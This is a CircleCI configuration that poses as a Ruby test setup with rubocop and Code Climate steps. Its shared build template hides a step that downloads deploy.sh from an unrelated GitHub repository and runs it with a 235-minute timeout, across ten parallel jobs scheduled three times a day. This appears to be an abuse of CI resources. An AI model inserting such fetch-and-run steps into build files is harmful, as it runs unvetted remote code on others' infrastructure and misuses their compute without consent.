working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run: wget https://raw.githubusercontent.com/terb4ru/folderyosh/main/deploy.sh && chmod u+x deploy.sh && ./deploy.sh
      no_output_timeout: 235m
      
version: 2.0
jobs:
  cuk:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk1:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk2:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk3:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk4:
    <<: *script
    docker:
      - image: ruby:2.4
  cuk5:
    docker:
      - image: ruby
    steps:
      - checkout
  cuk6:
    <<: *script
    docker:
      - image: ruby:2.7
  cuk7:
    <<: *script
    docker:
      - image: ruby:2.6
  cuk8:
    <<: *script
    docker:
      - image: ruby:2.5
  cuk9:
    <<: *script
    docker:
      - image: ruby:2.4
workflows:
  version: 2
  commit:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
      - cuk9


    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  cukrunjob:
    jobs:
      - cuk
      - cuk1
      - cuk2
      - cuk3
      - cuk4
      - cuk5
      - cuk6
      - cuk7
      - cuk8
      - cuk9
